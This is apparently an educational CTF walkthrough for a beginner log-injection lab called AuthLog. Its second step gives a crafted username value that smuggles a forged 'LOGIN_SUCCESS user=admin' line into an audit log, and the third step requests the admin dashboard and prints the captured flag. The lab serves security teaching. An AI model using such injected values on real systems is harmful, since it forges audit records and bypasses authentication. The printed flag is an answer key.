HACKR.GG
hackr.gg — AuthLog — Log Injection Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

AuthLog — Log Injection

Logging & Monitoring · Log Injection
Difficulty
Beginner
Vuln class
Log Injection
Steps
3
// Objective
Forge a fake successful login entry in the audit log to bypass the authentication check.
// Tools required
BrowserBurp Suitecurl
// Step-by-step walkthrough
1
Understand the log format
The app logs auth events in the format: [TIMESTAMP] LOGIN_SUCCESS user=USERNAME. The log is read by a monitoring script that grants access to users with recent LOGIN_SUCCESS entries.
2
Inject a forged log entry
The username field is logged without sanitisation. Inject a newline character followed by a forged success entry for admin.
Command / Input
username=guest [2024-01-01 00:00:00] LOGIN_SUCCESS user=admin&password=wrong
The \n in the username creates a new line in the log, inserting a fake success entry.
3
Trigger the monitoring check
Request the admin panel — the monitoring script reads the log, sees LOGIN_SUCCESS for admin, and grants access.
Command / Input
GET /admin/dashboard
Output
Access granted. HackrGG{l0g_1nj3ct10n_4ud1t_byp4ss}
// Flag
Flag value
HackrGG{l0g_1nj3ct10n_4ud1t_byp4ss}
Displayed on the admin dashboard after the forged log entry grants access.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute